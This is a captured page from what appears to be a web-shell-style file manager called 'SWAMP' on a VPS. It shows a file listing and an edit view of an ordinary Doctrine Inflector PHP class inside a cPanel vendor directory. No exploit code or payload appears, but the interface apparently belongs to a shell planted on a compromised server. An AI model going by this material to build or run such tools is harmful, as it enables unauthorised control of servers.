░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
vps.doorgans.com
LOCATION:
/opt/cpanel/ea-wappspector/vendor/doctrine/inflector/src/Rules/Esperanto
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: Uninflected.php
<?php declare(strict_types=1); namespace Doctrine\Inflector\Rules\Esperanto; use Doctrine\Inflector\Rules\Pattern; final class Uninflected { /** @return Pattern[] */ public static function getSingular(): iterable { yield from self::getDefault(); } /** @return Pattern[] */ public static function getPlural(): iterable { yield from self::getDefault(); } /** @return Pattern[] */ private static function getDefault(): iterable { yield new Pattern(''); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 Inflectible.php
PHP
738 B
2025-08-10 19:31
EDIT
📄 InflectorFactory.php
PHP
463 B
2025-08-10 19:31
EDIT
📄 Rules.php
PHP
876 B
2025-08-10 19:31
EDIT
📄 Uninflected.php
PHP
532 B
2025-08-10 19:31
EDIT